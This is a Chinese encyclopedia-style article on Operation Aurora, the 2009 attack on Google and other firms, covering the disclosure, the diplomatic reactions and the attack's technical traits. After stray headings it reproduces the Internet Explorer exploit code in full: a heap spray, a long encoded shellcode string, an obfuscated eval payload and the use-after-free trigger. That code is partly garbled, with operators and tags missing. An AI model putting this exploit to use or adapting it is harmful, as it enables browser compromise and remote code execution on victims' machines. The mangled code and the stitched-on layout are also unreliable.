极光行动（英语：Operation Aurora）或欧若拉行动是2009年12月中旬可能源自中国的一场网路攻击，其名称“Aurora”（意为极光、欧若拉）来自攻击者电脑上恶意档案所在路径的一部分。遭受攻击的除了Google外，还有20多家公司：其中包括Adobe Systems、Juniper Networks、Rackspace、雅虎、赛门铁克、诺斯洛普·格鲁门和陶氏化工。这场攻击过后，Google提出了它的新计画：它将“在必要的法律範围内”，于中国运营一个完全不受过滤的搜寻引擎；同时Google也承认，如果该计画不可实现，它将可能离开中国并关闭它在中国的办事处

2010年1月12日，Google在它的官方部落格上披露了该公司遭到网路攻击的时间。该文指出，Gmail服务在12月中旬遭到了来自中国“精心策划且目标明确”的攻击，此外还有20多家公司也遭受了类似的攻击（而部分来源显示超过34家）。在文中，Google进一步表示，由于中国政府在2009年对网上言论自由的继续收紧，它将计画“在必要的法律範围内”于中国运营一个完全不受过滤的搜寻引擎，并就此事与中国政府商讨；假如无法协调一致，Google将可能离开中国并关闭它在中国的办事处。Google还特意表明了该次决定是由美国的管理团队作出的，它的中国团队并不知情，也未曾参与。《连线》杂誌网站引述匿名讯息人士称，谷歌中国员工此前曾多次遭到讯问，他们因而希望这样能确保其中国员工的安全。

同日，美国国务卿希拉蕊·柯林顿发表了一则简短声明谴责此次攻击事件，并要求中国作出回应。中国政府当时并未做出正式回应，仅有一位匿名官员表示中国网路管理当局在收集更多关于Google退出中国声明的信。13日，AHN通讯社报导说，美国国会计画对Google的指控进行调查，后者指控中国政府利用计算机服务监视人权活动人士。1月14日，中国国务院新闻办公室主任王晨在接受《人民日报》记者採访时表示，网路安全主要受到了淫秽色情信息、黑客攻击、网路欺诈的威胁。法国国际广播电台（RFI）解读说，王晨的发言有着为中国网际网路审查制度辩护的明显用意。同日，中华人民共和国外交部发言人姜瑜也在例行记者会上表示，中国网际网路是开放的，中国政府依法管理网际网路，禁止任何黑客攻击行为，其针对网际网路的行政法规也符合国际惯例；并称中国政府将向美方重申该立场。2010年11月28日，维基解密泄露的一些外交电报具体描述了中国最高政治决策机构中央政治局是如何指导攻击谷歌计算机系统的。1月15日，《新闻周刊》网站刊发了对Google执行长埃里克·施密特的採访全文。斯密特在採访中透露说，他们正在与中国政府就谷歌中国的去留问题进行商讨。他并不否认有继续留在中国的可能性，同时也表示公司并不仅被商业利益所左右：他们退出中国市场是“基于价值的抉择”，否则就应当遵从商业抉择而“继续参与中国市场”。1月29日，谷歌CEO施密特在达沃斯论坛上再言反对中国网路审查制度。施密特重申谷歌希望在中国维持运营，但他也表示，如果必须遵守中国网路审查制度，那幺谷歌就不希望在中国继续做下去

在博文中，Google表示有部分智慧财产权遭到盗窃。它认为，黑客的主要兴趣在于访问中国持不同政见者的Gmail帐户。然而，黑客仅成功查看了两个账户的部分信息，而其中仅包含有邮件主题行以及账户创建日期。1月14日，防毒软体厂商McAfee发表文章分析说，这场攻击做得十分巧妙。攻击者利用了Internet Explorer浏览器的0day漏洞；微软已就这一问题发布了公告。Verisign的iDefense实验室称，这次攻击是由“中国或其代理人的特工”实施的。同时，利用漏洞的代码对代码中採用的堆喷射技术套用了javascript加密变形，使得检测困难。攻击者使用不同的免费2级域名作为跳板远程控制木马，攻击代码也有多个变种。中国的安全机构安天实验室发表的报告称，虽然一系列攻击的相关性很高，但是目前的证据还不能绝对确认所有的攻击都来自同一源头。

McAfee随后为客户提供了应对“极光行动”攻击的网页，并提醒用户在点击或打开可能带有恶意软体的电子邮件时需保持警惕：黑客会利用诸如为海地地震募捐等手段骗取用户打开钓鱼邮件

Evals

var n = unescape("%u0c0d%u0c0d");

while (n.length = 524288)n += n;

n = n.substring(0, 524269 - sc.length);

var x = new Array();

for (var i = 0; i 200; i ++ ){

x[i] = n + sc;

}

(repeated 1 time)

Writes

htmlscriptvar sc = unescape("

%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805

%uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2

%u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053

%ud9b2%u3081%udbb9%ud8d8%u213a%ub7b0%ud8b6%ub0d8%uaaad%ub5b4%u538c%ud49e%u0830%ud8da%u53d8

%ub230%u81d9%u9a30%ud8db%u3ad8%ub021%uebb4%ud8ea%uabb0%ubdb0%u8cb4%u9e53%u30d4%uda69%ud8d8

%u3053%ud9b2%u3081%udbfb%ud8d8%u213a%u3459%ud9d8%ud8d8%u0453%u1b59%ud858%ud8d8%ud8b2%uc2b2

%ub28b%u27d8%u9c8e%u18eb%u5898%udbe4%uadd8%u5121%u485e%ud8d8%u1fd8%udbdc%ub984%ubdf6%u9c1f

%udcdb%ubda0%ud8d8%u11eb%u8989%u8f8b%ueb89%u5318%u989e%u8630%ud8da%u5bd8%ud820%u5dd7%ud9a7

%ud8d8%ud8b2%ud8b2%udbb2%ud8b2%udab2%ud8b0%ud8d8%u8b18%u9e53%u30fc%udae5%ud8d8%u205b%ud727

%u865c%ud8d9%u51d8%ub89e%ud8b2%u2788%uf08e%u9e51%u53bc%u485e%ud8d8%u1fd8%udbdc%uba84%ubdf6

%u9c1f%udcdb%ubda0%ud8d8%ud8b2%ud8b2%udab2%ud8b2%ud8b2%ud8b0%ud8d8%u8b98%u9e53%u30fc%ud923

%ud8d8%u205b%ud727%uc45c%ud8d9%u51d8%u5c5e%ud8d8%u51d8%u5446%ud8d8%u53d8%ub89e%ud8b2%ud8b2

%ud8b2%u9e53%u88b8%u8e27%u1fe0%ua89e%ud8d8%ud8d8%u9e1f%ud8ac%ud8d8%u59d8%ud81f%ud8da%uebd8

%u5303%ubc86%ud8b2%u9e55%u88a8%ud8b0%ud8dc%u8fd8%uae27%u27b8%udc8e%u11eb%ud861%ud8dc%u58d8

%ud7a4%u4d27%ud4ac%ua458%u27d7%uacd8%u58dd%ud7ac%u4d27%u333a%u1b53%ud8f5%ud8dc%u5bd8%ud820

%udba7%u8651%ub2a8%u55d8%uac9e%u2788%ua8ae%u278f%u5c6e%ud8d8%u27d8%ue88e%u3359%udcd8%ud8d8

%u235b%ua7d8%u277d%ub8ae%u8e27%u27ec%u5c6e%ud8d8%u27d8%uec8e%u5e53%ud848%ud8d8%u4653%ud854

%ud8d8%udc1f%u84db%uf6b9%u8bbd%u8e27%u53f4%u5466%ud8d8%u53d8%u485e%ud8d8%u1fd8%udfdc%uba84

%ubdf6%u3459%ud9d8%ud8d8%u0453%ud8b0%ud8d9%u8bd8%ud8b0%ud8d9%u8fd8%ud8b2%ud8b2%u8e27%u53c4

%ueb23%ueb18%u5903%ud834%ud8da%u53d8%u5b14%u8c20%ud0a5%uc451%u5bd9%udc18%u2b33%u1453%u0153

%u1b5b%uebc8%u8818%u8b89%u8888%u8888%u8888%u888f%u5388%ud09e%u2f30%ud8d8%u53d8%ue4a6%uec30

%ud8d9%u30d8%ud8ef%ud8d8%ubbb0%uafae%ub0d8%ub0ab%ub7bc%u538c%ud49e%u6e30%ud8d8%u51d8%ue49e

%u79bc%ud8dc%ud8d8%u7855%u27b8%u2727%ubdb2%uae27%u53e4%uc89e%u4230%ud8d8%uebd8%u8b03%u8b8b

%u278b%u3008%ud83d%ud8d8%u3459%ud9d8%ud8d8%u2453%u1f5b%u1fdc%ueadf%u49ac%u1fd4%udc9f%u51bb

%u9709%u9f1f%u78d0%u4fbd%u1f13%ud49f%u9889%ua762%u9f1f%ue6c8%u6ec5%u1fe1%ucc9f%ub160%uc30c

%u9f1f%u66c0%ubea7%u1f78%uc49f%u7124%u75ef%u9f1f%u40f8%uc8d2%ubc20%ue879%ud8d8%u53d8%ud498

%ua853%u75c4%ub053%u53d0%u512f%ubc8e%udcb2%u3081%ud87b%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0

%ubdab%u8caa%ude53%uca30%ud8d8%u53d8%ub230%u81dd%u5c30%ud8d8%u3ad8%ueb21%u8f27%u8e27%u58dc

%u30e0%ue058%uad31%u59c9%udda0%u4848%u4848%ud0ac%u2753%u538d%u5534%udd98%u3827%ue030%ud8d8

%u1bd8%ue058%u5830%u31e0%uc9ad%ua059%u48dd%u4848%uac48%ub03f%ud2d0%ud8d8%u9855%u27dd%u3038

%ud8cf%ud8d8%u301b%ud8c9%ud8d8%uc960%udcd9%u1a58%ud8d4%uda33%u1b80%u2130%u2727%u8327%udf1e

%u5160%ud987%u1fbe%udd9f%u3827%u8b1b%u0453%ub28b%ub098%uc8d8%ud8d8%u538f%uf89e%u5e30%u2727

%u8027%u891b%u538e%ue4ad%uac53%ua0f6%u2ddb%u538e%uf8ae%u2ddb%u11eb%u9991%udb75%ueb1d%ud703

%uc866%u0ee2%ud0ac%u1319%udbdf%u9802%u2933%uc7e3%u3fad%u5386%ufc86%u05db%u53be%u93d4%u8653

%udbc4%u5305%u53dc%u1ddb%u8673%u1b81%uc230%u2724%u6a27%u3a2a%u6a2c%ud7ee%u28cb%ua390%ueae5

%u49ac%u5dd4%u7707%ubb63%u0951%u8997%u6298%udfa7%ufa4a%uc6a8%ubc7c%u4b37%u3cea%u564c%ud2cb

%ua174%u3ee1%u1c40%uc755%u8fac%ud5be%u9b27%u7466%u4003%uc8d2%u5820%u770e%u2342%ucd8b%ub0be

%uacac%ue2a8%uf7f7%ubdbc%ub7b5%uf6e9%uacbe%ub9a8%ubbbb%uabbd%uf6ab%ubbbb%ubcf7%ub5bd%uf7b7

%ubcb9%ub2f6%ubfa8%u00d8");

var sss = Array(826, 679, 798, 224, 770, 427, 819, 770, 707, 805, 693, 679, 784, 707, 280,

238, 259, 819, 336, 693, 336, 700, 259, 819, 336, 693, 336, 700, 238, 287, 413, 224, 833,

728, 735, 756, 707, 280, 770, 322, 756, 707, 770, 721, 812, 728, 420, 427, 371, 350, 364,

350, 392, 392, 287, 224, 770, 301, 427, 770, 413, 224, 770, 427, 770, 322, 805, 819, 686,

805, 812, 798, 735, 770, 721, 280, 336, 448, 371, 350, 364, 350, 378, 399, 315, 805, 693,

322, 756, 707, 770, 721, 812, 728, 287, 413, 826, 679, 798, 224, 840, 427, 770, 707, 833,

224, 455, 798, 798, 679, 847, 280, 287, 413, 224, 714, 777, 798, 280, 826, 679, 798, 224,

735, 427, 336, 413, 735, 420, 350, 336, 336, 413, 735, 301, 301, 287, 224, 861, 840, 637,

735, 651, 427, 770, 301, 805, 693, 413, 875);

var arr = new Array;

for (var i = 0; i sss.length; i ++ ){

arr[i] = String.fromCharCode(sss[i]/7); } var cc=arr.toString();cc=cc.replace(/ ,/ g, ""

);

cc = cc.replace(/@/g, ",");

eval(cc);

var x1 = new Array();

for (i = 0; i 200; i ++ ){

x1[i] = document.createElement("COMMENT");

x1[i].data = "abc";

}

;

var e1 = null;

function ev1(evt){

e1 = document.createEventObject(evt);

document.getElementById("sp1").innerHTML = "";

window.setInterval(ev2, 50);

}

function ev2(){

p = "

\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d

\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d

\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d";

for (i = 0; i x1.length; i ++ ){

x1[i].data = p;

}

;

var t = e1.srcElement;

}

/scriptspan id="sp1"IMG SRC="aaa.gif" onl oad="ev1(event)"/span/body/html